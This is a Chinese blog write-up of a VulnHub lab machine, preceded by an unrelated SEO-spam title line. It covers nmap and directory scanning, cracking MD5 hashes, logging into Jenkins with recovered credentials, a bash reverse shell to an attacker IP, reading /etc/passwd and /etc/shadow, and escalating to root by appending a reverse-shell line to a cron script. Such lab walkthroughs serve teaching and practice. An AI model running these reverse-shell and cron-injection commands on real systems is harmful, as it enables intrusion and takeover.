软件工程师多少钱一个月,seo引流软件,岐山网站开发,济南seo整站优化厂家#x1f36c; 博主介绍#x1f468;#x1f393; 博主介绍#xff1a;大家好#xff0c;我是 hacker-routing #xff0c;很高兴认识大家~
✨主攻领域#xff1a;【渗透领域】【应急响应】 【python】 【VulnHub靶场复现】【面试分析】
#x1f389;点赞➕评论➕收藏… 博主介绍 博主介绍大家好我是 hacker-routing 很高兴认识大家~
✨主攻领域【渗透领域】【应急响应】 【python】 【VulnHub靶场复现】【面试分析】
点赞➕评论➕收藏 养成习惯一键三连
欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋
作者水平有限欢迎各位大佬指点相互学习进步
一、信息收集
1.nmap扫描
┌──(rootkali)-[~/桌面]
└─# arp-scan -l
发现靶机IP192.168.103.196┌──(rootkali)-[~/桌面]
└─# nmap -sS -A 192.168.103.196/24扫描发现22、80、3306、8080端口 ┌──(rootkali)-[~/桌面]
└─# nmap --scriptvuln -p22,80,8080 192.168.103.196--scriptvuln 是nmap中的一个模块能够扫描端口中有哪些漏洞可以利用先登录下80端口
没有发现什么有价值的信息 再登录下8080端口
是个登录界面 2.目录扫描
1.扫描80端口
┌──(rootkali)-[~/桌面]
└─# dirsearch -u http://192.168.103.196/access.html目录
发现了一个页面好像是有几串加密了的字符串 ┌──(rootkali)-[~/桌面]
└─# hash-identifier 5978a63b4654c73c60fa24f836386d87 发现是md5加密 解码工具
MD5免费在线解密破解_MD5在线加密-SOMD5MD5在线免费破解,支持md5,sha1,mysql,sha256,sha512,md4,织梦,vBulletin,Discuz,md5(Joomla),mssql(2012),ntlm,md5(base64),sha1(base64),md5(wordpress),md5(Phpbb3),md5(Unix),des(Unix)等数十种加密方式https://www.somd5.com/
解码之后的结果是
tiago5978a63b4654c73c60fa24f836386d87:italia99trindade9b38e2b1e8b12f426b0d208a7ab6cb98:mariannaederf463f63616cb3f1e81ce46b39f882fd5: vipsu
2.扫描8080端口
发现了8080端口下面有一个robots.txt目录
并没有发现什么有价值的信息 二、漏洞利用
1.jenkins漏洞
大家可以上网找下这个工具的一些漏洞
三个账号密码都试下下面的是可以正常登陆进去后台的
账号eder
密码vipsu2.反弹shell
反弹shell木马
bash -i /dev/tcp/192.168.103.129/9999 01 ┌──(rootkali)-[~/桌面]
└─# nc -lvvp 9999
bash -i /dev/tcp/192.168.103.129/9999 01 三、提权
1.信息收集
就root和eder目前登录的账号有提权机会
bash-4.2$ cat /etc/passwd 没有查看密码的权限这条路说明走不通
cat /etc/shadow 2.查看历史进程
cat /etc/crontab说明我们可以追加一个木马进去然后五分钟可以反弹到root权限
echo bash -i /dev/tcp/192.168.103.129/44 01 /etc/script/CleaningScript.sh可以看到反弹成功了 3.flag
大概就是说恭喜你拿到了最高权限
相关文章: